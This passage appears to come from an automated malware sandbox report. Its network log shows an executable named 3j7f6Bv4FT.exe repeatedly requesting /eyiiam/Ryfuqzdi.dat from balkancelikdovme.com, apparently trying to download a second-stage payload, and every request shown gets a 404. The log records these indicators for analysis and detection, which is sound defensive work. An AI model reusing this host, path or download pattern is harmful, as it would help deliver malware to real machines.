      2025-01-10 22:05:27 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      43192.168.2.449779185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:28 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:28 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:28 GMT
      vary: User-Agent
      2025-01-10 22:05:28 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      44192.168.2.449780185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:29 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:29 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:29 GMT
      vary: User-Agent
      2025-01-10 22:05:29 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      45192.168.2.449781185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:30 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:31 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:31 GMT
      vary: User-Agent
      2025-01-10 22:05:31 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      46192.168.2.449782185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:31 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:32 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:31 GMT
      vary: User-Agent
      2025-01-10 22:05:32 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      47192.168.2.449783185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:32 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:32 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:32 GMT
      vary: User-Agent
      2025-01-10 22:05:32 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      48192.168.2.449784185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:33 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:33 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:33 GMT
      vary: User-Agent
      2025-01-10 22:05:33 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      49192.168.2.449785185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:34 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:34 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:34 GMT
      vary: User-Agent
      2025-01-10 22:05:34 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      50192.168.2.449786185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:35 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:35 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:35 GMT
      vary: User-Agent
      2025-01-10 22:05:35 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      51192.168.2.449787185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:36 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:36 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:36 GMT
      vary: User-Agent
      2025-01-10 22:05:36 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      52192.168.2.449788185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:37 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:37 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:37 GMT
      vary: User-Agent
      2025-01-10 22:05:37 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      53192.168.2.449789185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:37 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:38 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:38 GMT
      vary: User-Agent
      2025-01-10 22:05:38 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      54192.168.2.449790185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:38 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:39 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:39 GMT
      vary: User-Agent
      2025-01-10 22:05:39 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      55192.168.2.449791185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:39 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:39 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:39 GMT
      vary: User-Agent
      2025-01-10 22:05:39 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      56192.168.2.449792185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:40 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:40 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:40 GMT
      vary: User-Agent
